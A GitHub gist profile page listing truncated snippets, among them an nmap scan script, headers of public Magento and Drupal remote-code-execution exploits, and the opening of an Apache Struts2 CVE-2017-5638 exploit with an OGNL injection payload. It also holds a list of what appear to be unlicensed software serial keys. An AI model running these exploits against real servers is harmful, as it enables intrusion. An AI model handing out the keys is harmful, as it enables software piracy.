Skip to content

Instantly share code, notes, and snippets.

View Mah1ndra's full-sized avatar
🏡
Remote

Mahendra Thanniru Mah1ndra

🏡
Remote
View GitHub Profile
// Place your settings in this file to overwrite default and user settings.
{
"editor.wrappingColumn": 0,
"files.exclude": {
"**/node_modules": {},
"typings": {},
"**/*.map": {},
"**/*.js": {
"when": "$(basename).ts"
}
[
{
"name":"Barot Bellingham",
"shortname":"Barot_Bellingham",
"reknown":"Royal Academy of Painting and Sculpture",
"bio":"Barot has just finished his final year at The Royal Academy of Painting and Sculpture, where he excelled in glass etching paintings and portraiture. Hailed as one of the most diverse artists of his generation, Barot is equally as skilled with watercolors as he is with oils, and is just as well-balanced in different subject areas. Barot's collection entitled \"The Un-Collection\" will adorn the walls of Gilbert Hall, depicting his range of skills and sensibilities - all of them, uniquely Barot, yet undeniably different"
}, {
"name":"Jonathan G. Ferrar II",
"shortname":"Jonathan_Ferrar",
"reknown":"Artist to Watch in 2012",
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Page Title</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
#!/usr/bin/env python3
"""
Code takes urls from cmd line.
ex: ./crawler.py https://packages.debian.org/jessie/armel/patch/download
The Crawler downalods all the debian patch files from the give link and stores in the specified outpath
References:
https://stackoverflow.com/questions/12996274/get-file-size-from-content-length-value-from-a-file-in-python-3-2
https://stackoverflow.com/questions/29827479/beautifulsoup-download-all-zip-files-from-google-patent-search
"""
from bs4 import BeautifulSoup
@Mah1ndra
Mah1ndra / nmap.sh
Last active February 8, 2020 17:55
#!/bin/bash
ip=$1;
echo "scaning: $ip";
ports=$(nmap -T4 --min-rate=1000 -p- $ip| grep ^[0-9]|cut -d '/' -f 1| tr '\n' ',' | sed s/,$//);
echo "open ports: $ports"
Serial Keys:
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
GV7N2-DQZ00-4897Y-27ZNX-NV0TD
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
GZ3N0-6CX0L-H80UP-FPM59-NKAD4
YY31H-6EYEJ-480VZ-VXXZC-QF2E0
ZG51K-25FE1-H81ZP-95XGT-WV2C0
VG30H-2AX11-H88FQ-CQXGZ-M6AY4
@Mah1ndra
Mah1ndra / Magento-shoplift-rce.py
Last active July 15, 2020 00:39
Magento eCommerce - Remote Code Execution : xml/webapps/37977.py
##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author : Manish Kishan Tanwar AKA error1046
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At : Indishell Lab(originally developed by joren)
##################################################################################################
"""
////////////////////////
/// Overview:
# Drupal 7.x Module Services - Remote Code Execution
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
<?php
#!/bin/bash
VMWARE_VERSION=workstation-15.5.6
TMP_FOLDER=/tmp/patch-vmware
rm -fdr $TMP_FOLDER
mkdir -p $TMP_FOLDER
cd $TMP_FOLDER
git clone https://github.com/mkubecek/vmware-host-modules.git
cd $TMP_FOLDER/vmware-host-modules
git checkout $VMWARE_VERSION
git fetch
# Reference: https://medium.com/@lucideus/exploiting-apache-struts2-cve-2017-5638-lucideus-research-83adb9490ede
# CVE: 2017-5638 - Apache Struts2 S2-045
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."